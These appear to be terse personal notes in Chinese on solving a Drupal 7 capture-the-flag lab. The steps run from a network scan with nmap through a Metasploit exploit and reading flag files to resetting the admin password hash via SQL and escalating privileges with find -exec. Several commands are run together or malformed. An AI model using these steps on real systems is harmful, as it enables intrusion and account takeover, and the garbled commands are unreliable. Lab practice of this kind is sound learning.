1.先输入不ip add 得出自己的ip
2.再输入nmap -sP加上自己的ip/24得出
3.输入searchsploit drupal 7得出
4.输入msfconsole得出
5.然后前面换msf6 输入 use 1 然后输入自己的Ip
然后输入run攻击
6.先输入cd/home 在输入ls 在输入cd flag4/ 在输入ls 输入cat flag4.txt7.
7.在输入/var/www 输入ls 得出flag1txt
8.输入cat flag1.txt
9.输入show databases;得出
10.输入php scripts/password-hash.sh 自己设的新密码
11.将pass字段进行替换update userssetpass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw"where name="admin"要输入两遍 一遍要带空格
12.然后输入touch 123lsfind / -name 123 -exec "whoami"
13.然后返回前面的
14.输入cd /usr/share/john